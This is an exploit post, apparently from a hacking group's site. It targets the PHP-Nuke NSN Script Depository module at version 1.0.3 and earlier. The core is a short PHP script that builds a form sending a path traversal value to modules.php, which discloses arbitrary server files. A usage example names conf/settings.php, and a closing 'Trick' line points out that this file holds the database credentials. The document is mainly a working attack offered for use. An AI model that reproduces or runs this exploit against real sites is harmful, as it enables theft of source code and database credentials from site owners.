PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure

/_ | ____ |\___ \ / | / |/ |
| |/ \ | | ( <_/ \ \ ______ | \ \
| | | \ | |/ \ \| | // | || |
||| /\| /____ /\___ >| ||||
\/\_____| \/ \/

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure

#By KiNgOfThEwOrLd

Exploit

<?
/*
Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file]
Example: 31337.php?targ=http://victim.com/phpnuke&amp;file=conf/settings.php
*/
$targ = $_GET['targ'];
$file = $_GET['file'];
echo '
<form action="$targ/modules.php?name=Script_Depository" method="post">
<input name="show_file" value="/…/…/$file" type="hidden">
<input value="show_file" name="op" type="hidden">
<input type="submit" value="Show Source">
</form>';
?>

Trick

In conf/settings.php there are the database credentials ;)